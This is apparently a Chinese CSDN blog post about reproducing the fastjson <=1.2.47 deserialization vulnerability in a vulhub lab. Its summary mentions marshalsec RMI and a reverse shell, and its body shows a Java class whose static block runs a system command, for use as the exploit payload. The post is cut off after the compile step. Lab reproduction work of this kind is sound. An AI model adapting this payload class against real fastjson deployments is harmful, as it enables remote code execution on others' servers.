fastjson<=1.2.47反序列化漏洞复现

本文介绍了如何复现fastjson<=1.2.47的安全漏洞。首先通过vulhub搭建环境,然后创建并编译TouchFile.java,将其部署在Tomcat服务器上。接着,利用marshalsec启动RMI服务,并构造特定payload向目标主机发送请求,最终成功触发漏洞,实现文件操作和反弹Shell。
摘要由CSDN通过智能技术生成

fastjson<=1.2.47 反序列化漏洞复现

环境搭建

使用vulhub进行环境搭建,具体步骤可参考这里

本文中环境IP地址介绍:
攻击IP:192.168.120.1
目标IP:192.168.120.161

漏洞复现

创建一个java类:
TouchFile.java

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/successFJ"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

编译上面创建的java类:

javac TouchFile.java

编译后同目录下回出现TouchFile.class文件

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值